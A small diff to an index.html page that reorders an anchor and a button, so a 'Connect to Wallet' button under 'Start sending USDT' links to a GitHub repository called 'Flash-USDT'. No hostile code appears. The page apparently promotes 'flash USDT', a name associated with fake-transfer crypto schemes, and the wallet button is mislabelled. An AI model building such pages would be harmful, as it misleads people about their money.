--- a/index.html
+++ b/index.html
@@ -27,10 +27,10 @@
      <p class="text-gray-600">
       Start sending USDT
      </p>
-     <a href="https://github.com/VCamPro/Flash-USDT"> <button class="bg-green-500 text-white px-4 py-2 rounded-md mt-2 flex items-center">
-      Connect to Wallet 
+     <button class="bg-green-500 text-white px-4 py-2 rounded-md mt-2 flex items-center"> <a href="https://github.com/VCamPro/Flash-USDT">
+      Connect to Wallet </a>
       <i class="fas fa-lock ml-2">
-      </i></a>
+      </i>
      </button>
     </div>
    </div>
